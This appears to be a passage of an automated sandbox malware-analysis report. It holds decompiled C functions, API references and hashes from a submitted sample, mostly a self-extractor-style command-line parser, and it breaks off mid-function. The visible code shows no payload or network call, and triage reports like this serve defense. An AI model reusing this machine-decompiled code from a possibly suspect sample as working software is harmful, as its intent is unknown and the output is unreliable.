                                                                                                                                                                                                        • Opcode Fuzzy Hash: 362e7c564f70337166971d42632659c078195233edc7b51f5b79e199079f8181
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F054B17442086FE750FB759D06BBA76ECDB54700F4004AAA98DFA191ED7499448750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E84B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0xe88d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xe88d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xe88d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xe88d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xe88d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xe88d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xe88d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x00e84b66
                                                                                                                                                                                                        0x00e84b74
                                                                                                                                                                                                        0x00e84b98
                                                                                                                                                                                                        0x00e84ba0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84bac
                                                                                                                                                                                                        0x00e84ba4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84ba4
                                                                                                                                                                                                        0x00e84b78
                                                                                                                                                                                                        0x00e84b7e
                                                                                                                                                                                                        0x00e84b84
                                                                                                                                                                                                        0x00e84b8a
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00E84FA1,00000000), ref: 00E84B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: e1f32b0e39771a38ab21fe7af280a07e6c73a04e5c9c9bfbcb92512774d3a8b5
                                                                                                                                                                                                        • Instruction ID: 9d5b1d37d1982333289890ae6f4581767f392aa1ef5bc41f1f072a0bab5e3de6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1f32b0e39771a38ab21fe7af280a07e6c73a04e5c9c9bfbcb92512774d3a8b5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8F01971540B099E8771DF79CD04552BBEEEB993603501B2FA86EF21D1EB309841DBD0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E866AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00e866b1
                                                                                                                                                                                                        0x00e866ba
                                                                                                                                                                                                        0x00e866c7
                                                                                                                                                                                                        0x00e866bc
                                                                                                                                                                                                        0x00e866be
                                                                                                                                                                                                        0x00e866be

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00E84777,?,00E84E38,?), ref: 00E866B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: ca8ef27ea99db45fbb30066a88e8b9de709d4df2267dc52dc6b7a91f39a6d808
                                                                                                                                                                                                        • Instruction ID: eeaf14ed726f6f416b4179f961dc41f90cc02e03269528961d2a334012efe8ca
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca8ef27ea99db45fbb30066a88e8b9de709d4df2267dc52dc6b7a91f39a6d808
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31B0927622248046AA2017326C295662841B7C123A7E82BA1F03AE01E0DA3EC84AE204
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E84CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00e84caa
                                                                                                                                                                                                        0x00e84cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00E84CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: da9f08261537ddac2a9bf91127be8264d5ee40b6cbf71596a45a6ba5582af6c8
                                                                                                                                                                                                        • Instruction ID: d87573dd5bb6489791f2b685720241df130f0d137f87fc440b499906ea7f0825
                                                                                                                                                                                                        • Opcode Fuzzy Hash: da9f08261537ddac2a9bf91127be8264d5ee40b6cbf71596a45a6ba5582af6c8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB0123204420CBBDF001FC3EC09F853F1DE7C4761F280011F60C550508AB294108796
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E84CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00e84cc8
                                                                                                                                                                                                        0x00e84ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: 2e819437dae6c86cac46a9c699d2208a1817d3bca36da740c21bc48d7097f244
                                                                                                                                                                                                        • Instruction ID: 46f40b0b08e1395b08c72e5331f71815b78b6cf65b3bbf486a84b3c52fd0aed3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e819437dae6c86cac46a9c699d2208a1817d3bca36da740c21bc48d7097f244
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26B0123100010CBBCF001B43EC088453F1DD7C02607040021F50C551218B7398118685
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00E85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                        				char _t155;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                        				char _t167;
                                                                                                                                                                                                        				char _t170;
                                                                                                                                                                                                        				CHAR* _t173;
                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                                                        				intOrPtr* _t192;
                                                                                                                                                                                                        				CHAR* _t199;
                                                                                                                                                                                                        				void* _t200;
                                                                                                                                                                                                        				CHAR* _t201;
                                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                                        				void* _t206;
                                                                                                                                                                                                        				int _t209;
                                                                                                                                                                                                        				void* _t210;
                                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                                        				CHAR* _t218;
                                                                                                                                                                                                        				intOrPtr* _t219;
                                                                                                                                                                                                        				intOrPtr* _t220;
                                                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                                                        				signed int _t223;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                                                        				_t61 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                        				_t209 = 1;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					while(_t209 != 0) {
                                                                                                                                                                                                        						_t67 =  *_t173;
                                                                                                                                                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                        							_t173 = CharNextA(_t173);
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v272 = _t173;
                                                                                                                                                                                                        						if(_t67 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t69 = _v272;
                                                                                                                                                                                                        							_t177 = 0;
                                                                                                                                                                                                        							_t213 = 0;
                                                                                                                                                                                                        							_t163 = 0;
                                                                                                                                                                                                        							_t202 = 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								if(_t213 != 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t69 =  *_t69;
                                                                                                                                                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t69 = _v272;
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										_t155 =  *_t69;
                                                                                                                                                                                                        										if(_t155 != 0x22) {
                                                                                                                                                                                                        											if(_t202 >= 0x104) {
                                                                                                                                                                                                        												goto L106;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                        												_t177 = _t177 + 1;
                                                                                                                                                                                                        												_t202 = _t202 + 1;
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											if(_v272[1] == 0x22) {
                                                                                                                                                                                                        												if(_t202 >= 0x104) {
                                                                                                                                                                                                        													L106:
                                                                                                                                                                                                        													_t63 = 0;
                                                                                                                                                                                                        													L125:
                                                                                                                                                                                                        													_pop(_t210);
                                                                                                                                                                                                        													_pop(_t212);
                                                                                                                                                                                                        													_pop(_t162);
                                                                                                                                                                                                        													return E00E86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                        													_t177 = _t177 + 1;
                                                                                                                                                                                                        													_t202 = _t202 + 1;
                                                                                                                                                                                                        													_t157 = 2;
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												if(_t213 != 0) {
                                                                                                                                                                                                        													_t163 = 1;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t213 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L131;
                                                                                                                                                                                                        								L30:
                                                                                                                                                                                                        								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                        								_t69 = _v272;
                                                                                                                                                                                                        							} while ( *_t69 != 0);
                                                                                                                                                                                                        							if(_t177 >= 0x104) {
                                                                                                                                                                                                        								E00E86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                        								asm("int3");
                                                                                                                                                                                                        								_push(_t221);
                                                                                                                                                                                                        								_t222 = _t223;
                                                                                                                                                                                                        								_t71 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                        									0x4f0 = 2;
                                                                                                                                                                                                        									_t75 = E00E8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00E844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                        									 *0xe89124 = E00E86285();
                                                                                                                                                                                                        									_t75 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return E00E86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                        								if(_t213 == 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										_t79 = _v268;
                                                                                                                                                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                        											if(_t83 == 0) {
                                                                                                                                                                                                        												_t202 = 0x521;
                                                                                                                                                                                                        												E00E844B9(0, 0x521, 0xe81140, 0, 0x40, 0);
                                                                                                                                                                                                        												_t85 =  *0xe88588; // 0x0
                                                                                                                                                                                                        												if(_t85 != 0) {
                                                                                                                                                                                                        													CloseHandle(_t85);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												ExitProcess(0);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t87 = _t83 - 4;
                                                                                                                                                                                                        											if(_t87 == 0) {
                                                                                                                                                                                                        												if(_v266 != 0) {
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t50;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t88 =  *_t183;
                                                                                                                                                                                                        															_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
                                                                                                                                                                                                        															if(E00E8667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E00E8667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
                                                                                                                                                                                                        																	if(E00E85C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E00E81680(0xe88c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E00E8667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E00E8667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0xe88a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E00E85C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0xe88b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0xe88a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E00E81680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E00E8658A(_t218, 0x104, 0xe81140);
                                                                                                                                                                                                        																if(E00E831E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0xe88a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0xe88a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0xe88a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0xe88a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0xe88a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0xe89a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0xe89a2c =  *0xe89a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0xe88d48 =  *0xe88d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0xe89a2c =  *0xe89a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
